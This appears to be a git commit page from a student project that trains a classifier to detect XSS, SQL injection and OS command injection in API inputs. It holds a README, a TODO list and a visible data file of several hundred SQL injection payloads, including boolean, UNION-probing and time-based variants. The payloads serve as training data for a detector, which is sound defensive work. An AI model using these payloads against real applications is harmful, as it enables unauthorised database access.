s1201686
/
ProjektPython
1
0
Fork 0
Code Issues Pull Requests Projects Releases Wiki Activity

Aktualny stan projektu

This commit is contained in:
Krystian Piwowarczyk 2024-01-21 17:51:17 +01:00
commit 5a61942849
28 changed files with 48285 additions and 0 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

3
.idea/.gitignore vendored Normal file
View File

@ -0,0 +1,3 @@
# Default ignored files
/shelf/
/workspace.xml

6
.idea/inspectionProfiles/profiles_settings.xml Normal file
View File

@ -0,0 +1,6 @@
<component name="InspectionProjectProfileManager">
<settings>
<option name="USE_PROJECT_PROFILE" value="false" />
<version value="1.0" />
</settings>
</component>

7
.idea/misc.xml Normal file
View File

@ -0,0 +1,7 @@
<?xml version="1.0" encoding="UTF-8"?>
<project version="4">
<component name="Black">
<option name="sdkName" value="Python 3.10" />
</component>
<component name="ProjectRootManager" version="2" project-jdk-name="Python 3.10" project-jdk-type="Python SDK" />
</project>

8
.idea/modules.xml Normal file
View File

@ -0,0 +1,8 @@
<?xml version="1.0" encoding="UTF-8"?>
<project version="4">
<component name="ProjectModuleManager">
<modules>
<module fileurl="file://$PROJECT_DIR$/.idea/python3-project-bigdata.iml" filepath="$PROJECT_DIR$/.idea/python3-project-bigdata.iml" />
</modules>
</component>
</project>

8
.idea/python3-project-bigdata.iml Normal file
View File

@ -0,0 +1,8 @@
<?xml version="1.0" encoding="UTF-8"?>
<module type="PYTHON_MODULE" version="4">
<component name="NewModuleRootManager">
<content url="file://$MODULE_DIR$" />
<orderEntry type="inheritedJdk" />
<orderEntry type="sourceFolder" forTests="false" />
</component>
</module>

35
README.md Normal file
View File

@ -0,0 +1,35 @@
# Temat projektu
Projekt zwraca użytkownikowi informacje na temat tego czy przekazany poprzez API ciąg znaków zawiera w sobie próbę ataku z jednej z poniższych klas:
Cross Site-Scripting
SQL Injection
OS Command Injection
# Dane trenujące
Do wytrenowania sieci wykorzystano publicznie dostępne zbiory przykładowych payloadów:
https://github.com/payloadbox/xss-payload-list/blob/master/Intruder/xss-payload-list.txt
https://github.com/CyberM0nster/SQL-Injection-Payload-List-
https://github.com/omurugur/OS_Command_Payload_List/blob/master/OS-Command-Fuzzing.txt
Dane "zwykłe" (w rozumieniu - wolne od próby ataku na aplikacje) uzyskano poprzez framework Faker (10200 wartości).
Dane te wygenerowano z użyciem następujących funkcji:
faker.ascii_company_email()
faker.city()
faker.country()
faker.postcode()
faker.street_address()
faker.iban()
faker.company()
faker.credit_card_number()
faker.date_of_birth()
faker.domain_name()
faker.job()
faker.sentence(nb_words=10)
faker.passport_number()
faker.name()
faker.phone_number()
faker.ssn()
faker.user_agent()
Zbiór ten reprezentuje typowe dane wprowadzane przez użytkowników do formularzy w aplikacjach webowych.

30
TODO.txt Normal file
View File

@ -0,0 +1,30 @@
1. Wygenerowanie legitnych danych
2. Wytrenowanie lokalnego modelu - podzielenie danych na treningowe oraz testowe
3. Wystawienie modelu poprzez REST API
4. Stworzenie 2-3 przypadków testowych
5. Przygotowanie environment.yaml condy
6. Udostępnienie aplikacji w sieci wydziałowej (przez ten https://cloud.wmi.amu.edu.pl/#v1:0:18:4::::::: )
7. Przygotowanie prezentacji na zaliczenie (w tym dane histograficzne - rozkład znaków, długość ciągu znaków w przypadku zwykłych danych oraz ataków (pewnie przy róznych atakach pojawią się określone znaki specjalne) czyli zaprezentować analizę tego zbioru danych (tabelki, wykresy, wnioski))
Projekt ma posiadać environment.yaml condy - konfiguracja środowsika
do tego statystyki danych - jaki procent poszczególnych typów danych znajdował się w zbiorach treningowych, testowych itd.
dane histograficzne - rozkład znaków, długość ciągu znaków w przypadku zwykłych danych oraz ataków (pewnie przy róznych atakach pojawią się określone znaki specjalne)
Skala ocen:
- Należy wybrać zbiór danych (akceptacja grup oraz zbioru danych przez prowadzącego na pierwszych 17.11.21 lub drugich zajęciach 18.11.23), zaprezentować analizę tego zbioru danych (tabelki, wykresy, wnioski) w max 10 minut- zaliczenie na ocenę 3)
- Należy wytrenować prosty model uczenia maszynowego (lub użyć gotowego modelu) i zaprezentować jego wyniki na zbiorze testowym. Jakość modelu nie będzie oceniana, ale powinien radzić sobie lepiej niż bardzo prosty model (klasa większościowa dla klasyfikacji lub średnia dla regresji)- zaliczenie na ocenę 4
- Należy wystawić model z poprzedniego punktu w prostej aplikacji REST i zaprezentować jego działanie. Do aplikacji powininy być napisane conajmniej 2-3 proste przypadki testowe- zaliczenie na llocenę 4.5
- Należy udostępnić aplikację w sieci wydziałkowej 5

0
__init__.py Normal file
View File

BIN
__pycache__/__init__.cpython-311.pyc Normal file
View File

Binary file not shown.

BIN
__pycache__/main.cpython-310.pyc Normal file
View File

Binary file not shown.

BIN
__pycache__/main.cpython-311.pyc Normal file
View File

Binary file not shown.

BIN
__pycache__/test_main.cpython-311-pytest-7.4.0.pyc Normal file
View File

Binary file not shown.

6055
datasets/os-command-injection.txt Normal file
View File

File diff suppressed because it is too large Load Diff

23676
datasets/out.csv Normal file
View File

File diff suppressed because it is too large Load Diff

10200
datasets/regular_web_form_data.txt Normal file
View File

File diff suppressed because it is too large Load Diff

808
datasets/sql-injection.txt Normal file
View File

@ -0,0 +1,808 @@
OR 1=1
OR 1=0
OR x=x
OR x=y
OR 1=1#
OR 1=0#
OR x=x#
OR x=y#
OR 1=1--
OR 1=0--
OR x=x--
OR x=y--
OR 3409=3409 AND ('pytW' LIKE 'pytW
OR 3409=3409 AND ('pytW' LIKE 'pytY
HAVING 1=1
HAVING 1=0
HAVING 1=1#
HAVING 1=0#
HAVING 1=1--
HAVING 1=0--
AND 1=1
AND 1=0
AND 1=1--
AND 1=0--
AND 1=1#
AND 1=0#
AND 1=1 AND '%'='
AND 1=0 AND '%'='
AND 1083=1083 AND (1427=1427
AND 7506=9091 AND (5913=5913
AND 1083=1083 AND ('1427=1427
AND 7506=9091 AND ('5913=5913
AND 7300=7300 AND 'pKlZ'='pKlZ
AND 7300=7300 AND 'pKlZ'='pKlY
AND 7300=7300 AND ('pKlZ'='pKlZ
AND 7300=7300 AND ('pKlZ'='pKlY
AS INJECTX WHERE 1=1 AND 1=1
AS INJECTX WHERE 1=1 AND 1=0
AS INJECTX WHERE 1=1 AND 1=1#
AS INJECTX WHERE 1=1 AND 1=0#
AS INJECTX WHERE 1=1 AND 1=1--
AS INJECTX WHERE 1=1 AND 1=0--
WHERE 1=1 AND 1=1
WHERE 1=1 AND 1=0
WHERE 1=1 AND 1=1#
WHERE 1=1 AND 1=0#
WHERE 1=1 AND 1=1--
WHERE 1=1 AND 1=0--
ORDER BY 1--
ORDER BY 2--
ORDER BY 3--
ORDER BY 4--
ORDER BY 5--
ORDER BY 6--
ORDER BY 7--
ORDER BY 8--
ORDER BY 9--
ORDER BY 10--
ORDER BY 11--
ORDER BY 12--
ORDER BY 13--
ORDER BY 14--
ORDER BY 15--
ORDER BY 16--
ORDER BY 17--
ORDER BY 18--
ORDER BY 19--
ORDER BY 20--
ORDER BY 21--
ORDER BY 22--
ORDER BY 23--
ORDER BY 24--
ORDER BY 25--
ORDER BY 26--
ORDER BY 27--
ORDER BY 28--
ORDER BY 29--
ORDER BY 30--
ORDER BY 31337--
ORDER BY 1#
ORDER BY 2#
ORDER BY 3#
ORDER BY 4#
ORDER BY 5#
ORDER BY 6#
ORDER BY 7#
ORDER BY 8#
ORDER BY 9#
ORDER BY 10#
ORDER BY 11#
ORDER BY 12#
ORDER BY 13#
ORDER BY 14#
ORDER BY 15#
ORDER BY 16#
ORDER BY 17#
ORDER BY 18#
ORDER BY 19#
ORDER BY 20#
ORDER BY 21#
ORDER BY 22#
ORDER BY 23#
ORDER BY 24#
ORDER BY 25#
ORDER BY 26#
ORDER BY 27#
ORDER BY 28#
ORDER BY 29#
ORDER BY 30#
ORDER BY 31337#
ORDER BY 1
ORDER BY 2
ORDER BY 3
ORDER BY 4
ORDER BY 5
ORDER BY 6
ORDER BY 7
ORDER BY 8
ORDER BY 9
ORDER BY 10
ORDER BY 11
ORDER BY 12
ORDER BY 13
ORDER BY 14
ORDER BY 15
ORDER BY 16
ORDER BY 17
ORDER BY 18
ORDER BY 19
ORDER BY 20
ORDER BY 21
ORDER BY 22
ORDER BY 23
ORDER BY 24
ORDER BY 25
ORDER BY 26
ORDER BY 27
ORDER BY 28
ORDER BY 29
ORDER BY 30
ORDER BY 31337
RLIKE (SELECT (CASE WHEN (4346=4346) THEN 0x61646d696e ELSE 0x28 END)) AND 'Txws'='
RLIKE (SELECT (CASE WHEN (4346=4347) THEN 0x61646d696e ELSE 0x28 END)) AND 'Txws'='
IF(7423=7424) SELECT 7423 ELSE DROP FUNCTION xcjl--
IF(7423=7423) SELECT 7423 ELSE DROP FUNCTION xcjl--
%' AND 8310=8310 AND '%'='
%' AND 8310=8311 AND '%'='
and (select substring(@@version,1,1))='X'
and (select substring(@@version,1,1))='M'
and (select substring(@@version,2,1))='i'
and (select substring(@@version,2,1))='y'
and (select substring(@@version,3,1))='c'
and (select substring(@@version,3,1))='S'
and (select substring(@@version,3,1))='X'
'
''
`
``
,
"
""
/
//
\
\\
;
' or "
-- or #
' OR '1
' OR 1 -- -
" OR "" = "
" OR 1 = 1 -- -
' OR '' = '
'='
'LIKE'
'=0--+
OR 1=1
' OR 'x'='x
' AND id IS NULL; --
'''''''''''''UNION SELECT '2
%00
/*…*/
+ addition, concatenate (or space in url)
|| (double pipe) concatenate
% wildcard attribute indicator
@variable local variable
@@variable global variable
# Numeric
AND 1
AND 0
AND true
AND false
1-false
1-true
1*56
-2
1' ORDER BY 1--+
1' ORDER BY 2--+
1' ORDER BY 3--+
1' ORDER BY 1,2--+
1' ORDER BY 1,2,3--+
1' GROUP BY 1,2,--+
1' GROUP BY 1,2,3--+
' GROUP BY columnnames having 1=1 --
-1' UNION SELECT 1,2,3--+
' UNION SELECT sum(columnname ) from tablename --
-1 UNION SELECT 1 INTO @,@
-1 UNION SELECT 1 INTO @,@,@
1 AND (SELECT * FROM Users) = 1
' AND MID(VERSION(),1,1) = '5';
' and 1 in (select min(name) from sysobjects where xtype = 'U' and name > '.') --
Finding the table name
Time-Based:
,(select * from (select(sleep(10)))a)
%2c(select%20*%20from%20(select(sleep(10)))a)
';WAITFOR DELAY '0:0:30'--
# from wapiti
sleep(5)#
1 or sleep(5)#
" or sleep(5)#
' or sleep(5)#
" or sleep(5)="
' or sleep(5)='
1) or sleep(5)#
") or sleep(5)="
') or sleep(5)='
1)) or sleep(5)#
")) or sleep(5)="
')) or sleep(5)='
;waitfor delay '0:0:5'--
);waitfor delay '0:0:5'--
';waitfor delay '0:0:5'--
";waitfor delay '0:0:5'--
');waitfor delay '0:0:5'--
");waitfor delay '0:0:5'--
));waitfor delay '0:0:5'--
'));waitfor delay '0:0:5'--
"));waitfor delay '0:0:5'--
benchmark(10000000,MD5(1))#
1 or benchmark(10000000,MD5(1))#
" or benchmark(10000000,MD5(1))#
' or benchmark(10000000,MD5(1))#
1) or benchmark(10000000,MD5(1))#
") or benchmark(10000000,MD5(1))#
') or benchmark(10000000,MD5(1))#
1)) or benchmark(10000000,MD5(1))#
")) or benchmark(10000000,MD5(1))#
')) or benchmark(10000000,MD5(1))#
pg_sleep(5)--
1 or pg_sleep(5)--
" or pg_sleep(5)--
' or pg_sleep(5)--
1) or pg_sleep(5)--
") or pg_sleep(5)--
') or pg_sleep(5)--
1)) or pg_sleep(5)--
")) or pg_sleep(5)--
')) or pg_sleep(5)--
AND (SELECT * FROM (SELECT(SLEEP(5)))bAKL) AND 'vRxe'='vRxe
AND (SELECT * FROM (SELECT(SLEEP(5)))YjoC) AND '%'='
AND (SELECT * FROM (SELECT(SLEEP(5)))nQIP)
AND (SELECT * FROM (SELECT(SLEEP(5)))nQIP)--
AND (SELECT * FROM (SELECT(SLEEP(5)))nQIP)#
SLEEP(5)#
SLEEP(5)--
SLEEP(5)="
SLEEP(5)='
or SLEEP(5)
or SLEEP(5)#
or SLEEP(5)--
or SLEEP(5)="
or SLEEP(5)='
waitfor delay '00:00:05'
waitfor delay '00:00:05'--
waitfor delay '00:00:05'#
benchmark(50000000,MD5(1))
benchmark(50000000,MD5(1))--
benchmark(50000000,MD5(1))#
or benchmark(50000000,MD5(1))
or benchmark(50000000,MD5(1))--
or benchmark(50000000,MD5(1))#
pg_SLEEP(5)
pg_SLEEP(5)--
pg_SLEEP(5)#
or pg_SLEEP(5)
or pg_SLEEP(5)--
or pg_SLEEP(5)#
'\"
AnD SLEEP(5)
AnD SLEEP(5)--
AnD SLEEP(5)#
&&SLEEP(5)
&&SLEEP(5)--
&&SLEEP(5)#
' AnD SLEEP(5) ANd '1
'&&SLEEP(5)&&'1
ORDER BY SLEEP(5)
ORDER BY SLEEP(5)--
ORDER BY SLEEP(5)#
(SELECT * FROM (SELECT(SLEEP(5)))ecMj)
(SELECT * FROM (SELECT(SLEEP(5)))ecMj)#
(SELECT * FROM (SELECT(SLEEP(5)))ecMj)--
+benchmark(3200,SHA1(1))+'
+ SLEEP(10) + '
RANDOMBLOB(500000000/2)
AND 2947=LIKE('ABCDEFG',UPPER(HEX(RANDOMBLOB(500000000/2))))
OR 2947=LIKE('ABCDEFG',UPPER(HEX(RANDOMBLOB(500000000/2))))
RANDOMBLOB(1000000000/2)
AND 2947=LIKE('ABCDEFG',UPPER(HEX(RANDOMBLOB(1000000000/2))))
OR 2947=LIKE('ABCDEFG',UPPER(HEX(RANDOMBLOB(1000000000/2))))
SLEEP(1)/*' or SLEEP(1) or '" or SLEEP(1) or "*/
ORDER BY SLEEP(5)
ORDER BY 1,SLEEP(5)
ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A'))
ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4
ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5
ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6
ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7
ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8
ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9
ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10
ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11
ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12
ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13
ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14
ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14
ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14,15
ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14,15,16
ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14,15,16,17
ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18
ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19
ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20
ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21
ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22
ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23
ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24
ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25
ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26
ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27
ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28
ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29
ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30
ORDER BY SLEEP(5)#
ORDER BY 1,SLEEP(5)#
ORDER BY 1,SLEEP(5),3#
ORDER BY 1,SLEEP(5),3,4#
ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5#
ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6#
ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7#
ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8#
ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9#
ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10#
ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11#
ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12#
ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13#
ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14#
ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14#
ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14,15#
ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14,15,16#
ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14,15,16,17#
ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18#
ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19#
ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20#
ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21#
ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22#
ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23#
ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24#
ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25#
ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26#
ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27#
ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28#
ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29#
ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30#
ORDER BY SLEEP(5)--
ORDER BY 1,SLEEP(5)--
ORDER BY 1,SLEEP(5),3--
ORDER BY 1,SLEEP(5),3,4--
ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5--
ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6--
ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7--
ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8--
ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9--
ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10--
ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11--
ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12--
ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13--
ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14--
ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14--
ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14,15--
ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14,15,16--
ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14,15,16,17--
ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18--
ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19--
ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20--
ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21--
ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22--
ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23--
ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24--
ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25--
ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26--
ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27--
ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28--
ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29--
ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30--
UNION ALL SELECT 1
UNION ALL SELECT 1,2
UNION ALL SELECT 1,2,3
UNION ALL SELECT 1,2,3,4
UNION ALL SELECT 1,2,3,4,5
UNION ALL SELECT 1,2,3,4,5,6
UNION ALL SELECT 1,2,3,4,5,6,7
UNION ALL SELECT 1,2,3,4,5,6,7,8
UNION ALL SELECT 1,2,3,4,5,6,7,8,9
UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10
UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11
UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12
UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13
UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14
UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15
UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16
UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17
UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18
UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19
UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20
UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21
UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22
UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23
UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24
UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25
UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26
UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27
UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28
UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29
UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30
UNION ALL SELECT 1#
UNION ALL SELECT 1,2#
UNION ALL SELECT 1,2,3#
UNION ALL SELECT 1,2,3,4#
UNION ALL SELECT 1,2,3,4,5#
UNION ALL SELECT 1,2,3,4,5,6#
UNION ALL SELECT 1,2,3,4,5,6,7#
UNION ALL SELECT 1,2,3,4,5,6,7,8#
UNION ALL SELECT 1,2,3,4,5,6,7,8,9#
UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10#
UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11#
UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12#
UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13#
UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14#
UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15#
UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16#
UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17#
UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18#
UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19#
UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20#
UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21#
UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22#
UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23#
UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24#
UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25#
UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26#
UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27#
UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28#
UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29#
UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30#
UNION ALL SELECT 1--
UNION ALL SELECT 1,2--
UNION ALL SELECT 1,2,3--
UNION ALL SELECT 1,2,3,4--
